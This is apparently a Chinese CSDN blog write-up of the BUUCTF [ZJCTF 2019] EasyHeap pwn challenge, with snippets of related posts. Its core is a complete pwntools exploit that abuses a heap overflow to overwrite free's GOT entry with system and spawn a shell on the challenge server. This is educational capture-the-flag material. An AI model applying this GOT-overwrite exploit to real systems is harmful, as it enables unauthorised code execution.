[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap

最新推荐文章于 2024-01-12 22:00:27 发布
最新推荐文章于 2024-01-12 22:00:27 发布
阅读量1k 收藏 1
点赞数 2
CC 4.0 BY-SA版权
分类专栏: # 堆利用 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/121364088
这篇博客介绍了一个CTF挑战的解决方案,主要涉及堆溢出漏洞利用。作者通过操纵函数的 GOT 表,将 `system` 函数指针指向 `/bin/sh`,最终实现执行 shell 的目标。利用过程包括了多次内存分配、释放和修改堆块,以达到控制程序执行流的目的。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap

思路

我们第一个想法肯定是执行l33t这个函数,事实证明被摆了一道。没有结果,
但是我们有system函数我们可以将其放入我们可以操控的函数,比如printf、puts、gets、free等函数的got表,通过传入/bin/sh来解决。利用堆漏洞就可以达到其目的。

exploit

from pwn import *

context(os='linux',arch='amd64',log_level='debug')

p = remote("node4.buuoj.cn",28081)
elf = ELF('easyheap')
p.sendafter('Your choice :',b'1\n')  
p.sendafter('Size of Heap : ',b'96\n')
p.sendafter('Content of heap:',b'\n')

p.sendafter('Your choice :',b'1\n')  
p.sendafter('Size of Heap : ',b'96\n')
p.sendafter('Content of heap:',b'\n')

p.sendafter('Your choice :',b'3\n')   # free 1
p.sendafter('Index :','1\n')

payload = p64(0x0) * 13 + p64(0x71)  + p64(0x6020ad) + p64(0x0)
p.sendafter('Your choice :',b'2\n')
p.sendafter('Index :',b'0\n')
p.sendafter('Size of Heap : ',b'1000\n')
p.sendafter('Content of heap : ',payload)


p.sendafter('Your choice :',b'1\n')      
p.sendafter('Size of Heap : ',b'96\n')
p.sendafter('Content of heap:',b'\n')


p.sendafter('Your choice :',b'1\n')  
p.sendafter('Size of Heap : ',b'96\n')
p.sendafter('Content of heap:',b'\n')

payload = b'a' * 35 + p64(elf.got['free'])   
p.sendafter('Your choice :',b'2\n')
p.sendafter('Index :',b'2\n')
p.sendafter('Size of Heap : ',b'1000\n')
p.sendafter('Content of heap : ',payload)


sys_addr = 0x400700
p.sendafter('Your choice :',b'2\n')
p.sendafter('Index :',b'0\n')
p.sendafter('Size of Heap : ',b'1000\n')
p.sendafter('Content of heap : ',p64(sys_addr))

binsh = '/bin/sh\x00'
p.sendafter('Your choice :',b'2\n')
p.sendafter('Index :',b'1\n')
p.sendafter('Size of Heap : ',b'1000\n')
p.sendafter('Content of heap : ',binsh)

p.sendafter('Your choice :',b'3\n')
p.sendafter('Index :',b'1\n')

p.interactive()
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2933
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
[ZJCTF 2019]EasyHeap
qq_39869547的博客
01-31 947
常规堆溢出题,存在后门。但是buuctf没有复现环境。所有就用system_plt了。 # -*- coding: utf-8 -*- from PwnContext.core import * binary = './easyheap' debug_libc = './libc-2.23.so' elf = ELF(binary) libc = ELF(debug_libc) local = 1...
buuctf [ZJCTF 2019]EasyHeap
weixin_45677731的博客
08-24 1074
这题只有add,edit,delete三个主体部分,没有show的部分 create_heap函数,chunk的指针保存在bss段的heaparray数组处 edit_heap函数,注意这里输入的数据长度是可以自己设置的,就可以随意溢出了 delete_heap函数 除此之外,还有这样一个l33t函数: 在程序中,你只要满足一定的条件,是可以运行这个函数的,我猜测在[ZJCTF 2019]比赛进行的时候可能这个函数是可以利用的,但现在在buu上面是用不了的,flag文件的目录不对。不过,这个sys
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
[BUUCTF]-PWN:[ZJCTF 2019]EasyHeap解析
2301_79326813的博客
01-12 883
这是buu上的一道堆题,话不多说直接看保护和ida这里有一个要注意的点,那就是它是partial RELRO,Full RELRO开启说明got表不可写,而这里没有,这是我们解题的一个前提。然后看ida。这里不过多解释,主要还是创建堆块,释放堆块,edit堆块,但是没有打印堆块内容的函数。还有一个要注意的点,那就是他有system函数,并且参数似乎可以利用。虽然在我解题的过程中这个函数压根得不到flag,但我还是想从这一角度讲解一下解题思路,所以我分两个角度来讲。
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1117
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF-PWN roarctf_2019_easyheap(double free, stdout重定向)
weixin_44145820的博客
04-23 898
这里写目录标题题目分析漏洞利用Exp 题目分析 有添加,删除,展示三个主要功能,不过添加有次数限制,同时限制了申请大小,使得我们不能申请出unsorted bin范围内的chunk 删除之后没有置空,可以多次free show功能有条件限制,而且会把stdout关了 添加和后门的次数 后门函数可以进行calloc和free,同样没有置空,但是后门函数的次数限制逻辑有问题,即使为0还会再...
BUUCTF-[ZJCTF 2019]EasyHeap1
Rt1Text的博客
09-25 1096
经典堆菜单。
BUUCTF pwn——[ZJCTF 2019]EasyHeap
CNS-Enterprise BCC-1701-J
05-30 365
BUUCTF 做题练习
[BUUCTF]PWN——[ZJCTF 2019]EasyHeap
mcmuyanga的博客
12-16 589
[ZJCTF 2019]EasyHeap 附件 步骤: 例行检查,64位程序 试运行一下看看程序大概执行的情况,经典的堆块的菜单 64位ida载入,首先检索字符串,发现了读出flag的函数 看一下每个选项的函数 add 这边size的大小由我们输入控制,heaparray数组在bss段上存放着我们chunk的指针 edit,简单的根据指针修改对应chunk里的值,但是这里的size也是由我们手动输入的,也就是说只要我们这边输入的size比add的时候输入的size大就会造成溢出 delete,释
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门
weixin_45441024的博客
12-27 748
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门 一般的堆题都是这种表单形式的
heap2-[ZJCTF 2019]EasyHeap
qq_51687381的博客
07-27 241
做题先check找攻击手段,Partial RELRP ->修改got表 菜单题,直接找准delete看看有没有UAF。 UAF未果。 但是在Edit_heap中存在漏洞。 这里看起来是以为可以修改heap的size,其实这个size是用来对你的输入进行限制的。(栈溢出就在这里把size写的很大,方便我们写入) 而且这个程序写的也有点问题。 它会让你修改chunk的信息域 所以 wp from pwn import * sh = remote("node4....
[ZJCTF 2019]EasyHeap-house of spirit
huzai9527的博客
03-15 286
[ZJCTF 2019]EasyHeap-house of spirit 先给出exp,exp中我标明了每一个步骤 每个步骤执行完后,内存中的地址空间我也贴出来了 exp from pwn import * p = remote('node3.buuoj.cn',29012) #p = process('./easyheap') context.log_level = 'debug' def creat(size,content): p.sendlineafter('Your choice :',st
[ZJCTF 2019]EasyHeap-patchlibc-调试
个人笔记
04-25 708
后面只用关注伪造的fd地址0x6020C8即可,也即是heaparray_addr - 0x18。heaparray_addr = malloc(chunk0)这里获得的就是&chunk[0];1、伪造chunk[2]=[全局地址-3];chunk[3] = [全局地址-2]通过修改chunk[3]的值 ->控制 &chunk[0] ->4、给任意地址填入内容,chunk[0] = [任意内容]3、填入控制任意地址,chunk[3] = [任意地址]chunk[3] ->实现[任意地址]写。
buuctf-pwn入门
最新发布
01-26
### BUUCTF PWN 类题目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro权威指南》能够帮助掌握逆向工程工具的使用技巧,这对解决PWN问题非常有帮助[^1]。 #### 实践平台建议 为了更好地练习技能并应用所学知识,在线实践环境不可或缺。BuuOJ是一个专门为CTF爱好者设计的学习与交流社区,其中包含了大量针对不同难度级别的PWN题目供玩家尝试解答[^2]。通过不断做题积累经验,可以逐步提高自己的技术水平。 #### 解决方案流程概述 当面对具体的PWN题目时,通常遵循以下几个步骤来构建解决方案: - **检测保护机制**:利用`checksec`命令查看目标程序启用了哪些安全防护措施; - **静态分析**:借助IDA Pro等反汇编器对二进制文件进行深入剖析,找出潜在漏洞点; - **编写Exploit脚本**:基于发现的安全缺陷精心构造攻击载荷; - **测试验证**:最后一步是在本地环境中反复调试直至成功获取Flag。 ```bash # 使用 checksec 工具检查可执行文件的安全特性 $ checksec ./vuln_program ``` ```python from pwn import * # 连接到远程服务器上的服务端口 conn = remote('example.com', 9999) # 发送恶意输入数据给存在缓冲区溢出漏洞的服务进程 payload = b'A' * offset + pack(address) conn.sendline(payload) # 接收返回的数据包以确认是否获得shell访问权限 response = conn.recv() print(response.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值